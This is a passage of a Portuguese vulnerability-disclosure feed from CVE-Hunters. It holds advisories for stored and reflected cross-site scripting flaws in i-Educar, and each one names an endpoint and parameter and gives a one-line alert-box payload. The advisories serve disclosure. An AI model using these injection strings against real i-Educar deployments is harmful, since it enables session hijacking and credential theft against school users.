href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8542.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8543/ https://www.cvehunters.com/pt/p/cve-2025-8543/ <h2 id="cve-2025-8543-cross-site-scripting-xss-armazenado-no-endpoint-educar_raca_cadphp-parâmetro-nm_raca">CVE-2025-8543: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_raca_cad.php</code> parâmetro <code>nm_raca</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8543" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8543</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_raca_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_raca</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_raca_cad.php</code></p><h2 id="cve-2025-8543-cross-site-scripting-xss-armazenado-no-endpoint-educar_raca_cadphp-parâmetro-nm_raca">CVE-2025-8543: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_raca_cad.php</code> parâmetro <code>nm_raca</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8543" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8543</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_raca_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_raca</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_raca_cad.php</code></p> <p>Parâmetro: <code>nm_raca</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nm_raca</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8543/image.png" width="628" height="253" srcset="/p/cve-2025-8543/image_hu_657529f7cbce2b77.png 480w, /p/cve-2025-8543/image_hu_c95c71084112a8f3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="595px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8543.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8544/ https://www.cvehunters.com/pt/p/cve-2025-8544/ <h2 id="cve-2025-8544-cross-site-scripting-xss-armazenado-no-endpoint-regraavaliacaoedit-parâmetro-nome">CVE-2025-8544: Cross-Site Scripting (XSS) Armazenado no endpoint <code>RegraAvaliacao/edit</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8544" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8544</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>RegraAvaliacao/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>RegraAvaliacao/edit</code></p><h2 id="cve-2025-8544-cross-site-scripting-xss-armazenado-no-endpoint-regraavaliacaoedit-parâmetro-nome">CVE-2025-8544: Cross-Site Scripting (XSS) Armazenado no endpoint <code>RegraAvaliacao/edit</code> parâmetro <code>nome</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8544" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8544</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>RegraAvaliacao/edit</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nome</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>RegraAvaliacao/edit</code></p> <p>Parâmetro: <code>nome</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nome</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8544/image.png" width="617" height="264" srcset="/p/cve-2025-8544/image_hu_5bcb3566c566cb66.png 480w, /p/cve-2025-8544/image_hu_835b7da877dee7e9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="560px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8544.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8545/ https://www.cvehunters.com/pt/p/cve-2025-8545/ <h2 id="cve-2025-8545-cross-site-scripting-xss-armazenado-no-endpoint-educar_motivo_afastamento_cadphp-parâmetro-nm_motivo">CVE-2025-8545: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_motivo_afastamento_cad.php</code> parâmetro <code>nm_motivo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8545" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8545</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_motivo_afastamento_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_motivo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_motivo_afastamento_cad.php</code></p><h2 id="cve-2025-8545-cross-site-scripting-xss-armazenado-no-endpoint-educar_motivo_afastamento_cadphp-parâmetro-nm_motivo">CVE-2025-8545: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_motivo_afastamento_cad.php</code> parâmetro <code>nm_motivo</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8545" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8545</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_motivo_afastamento_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>nm_motivo</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>educar_motivo_afastamento_cad.php</code></p> <p>Parâmetro: <code>nm_motivo</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>nm_motivo</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8545/image.png" width="642" height="280" srcset="/p/cve-2025-8545/image_hu_c4c84f0f5992b394.png 480w, /p/cve-2025-8545/image_hu_1f598e1f64a3f4ff.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="229" data-flex-basis="550px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8545.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 05 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8507/ https://www.cvehunters.com/pt/p/cve-2025-8507/ <h2 id="cve-2025-8507-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-intraneteducar_funcao_lstphp">CVE-2025-8507: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>/intranet/educar_funcao_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8507" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8507</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>/intranet/educar_funcao_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_funcao</code> e <code>abreviatura</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_lst.php</code></p> <p>Parâmetros: <code>nm_funcao</code> e <code>abreviatura</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_funcao</code> e <code>abreviatura</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p><h2 id="cve-2025-8507-múltiplos-cross-site-scripting-xss-refletido-no-endpoint-intraneteducar_funcao_lstphp">CVE-2025-8507: Múltiplos Cross-Site Scripting (XSS) Refletido no endpoint <code>/intranet/educar_funcao_lst.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8507" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8507</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Refletido) foram identificadas no endpoint <code>/intranet/educar_funcao_lst.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>nm_funcao</code> e <code>abreviatura</code>.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_funcao_lst.php</code></p> <p>Parâmetros: <code>nm_funcao</code> e <code>abreviatura</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>nm_funcao</code> e <code>abreviatura</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8507/image.png" width="963" height="838" srcset="/p/cve-2025-8507/image_hu_c32e7fef2db934c5.png 480w, /p/cve-2025-8507/image_hu_bf469db527e5022b.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="275px" /></p> <p style="text-align: justify;">O mesmo problema acontece com o parâmetro <code>abreviatura</code>.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8507.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8508/ https://www.cvehunters.com/pt/p/cve-2025-8508/ <h2 id="cve-2025-8508-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_avaliacao_desempenho_cadphp">CVE-2025-8508: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8508" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8508</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>titulo_avaliacao</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_avaliacao_desempenho_cad.php</code></p><h2 id="cve-2025-8508-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_avaliacao_desempenho_cadphp">CVE-2025-8508: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8508" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8508</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint <code>/intranet/educar_avaliacao_desempenho_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros <code>titulo_avaliacao</code> e <code>descricao</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_avaliacao_desempenho_cad.php</code></p> <p>Parâmetros: <code>titulo_avaliacao</code> e <code>descricao</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros <code>titulo_avaliacao</code> e <code>descricao</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC-XXS51'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-8508/image.png" width="737" height="887" srcset="/p/cve-2025-8508/image_hu_2db57f13ab8e6adc.png 480w, /p/cve-2025-8508/image_hu_60c2e044653244a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="83" data-flex-basis="199px" /></p> <p style="text-align: justify;">O payload foi enviado por meio dos campos <code>titulo_avaliacao</code> e <code>descricao</code> e armazenado com sucesso. Quando a página que exibe esses valores é acessada, o script é executado no contexto da sessão do navegador do usuário, confirmando a presença de uma vulnerabilidade XSS armazenada.</p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8508.md</a></p> <h2 id="encontrado-por">Encontrado por: </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 03 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-8509/ https://www.cvehunters.com/pt/p/cve-2025-8509/ <h2 id="cve-2025-8509-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_servidor_cadphp-parâmetro-matricula">CVE-2025-8509: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/intranet/educar_servidor_cad.php</code> parâmetro <code>matricula</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8509" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8509</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/intranet/educar_servidor_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>matricula</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_servidor_cad.php</code></p><h2 id="cve-2025-8509-cross-site-scripting-xss-armazenado-no-endpoint-intraneteducar_servidor_cadphp-parâmetro-matricula">CVE-2025-8509: Cross-Site Scripting (XSS) Armazenado no endpoint <code>/intranet/educar_servidor_cad.php</code> parâmetro <code>matricula</code> </h2><blockquote> <p><em><strong>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-8509" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-8509</a></strong></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>/intranet/educar_servidor_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>matricula</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_servidor_cad.php</code></p> <p>Parâmetro: <code>matricula</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>matricula</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(12)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Na página <code>/intranet/educar_servidor_det.php?cod_servidor=28915&ref_cod_instituicao=1</code>, clique no botão 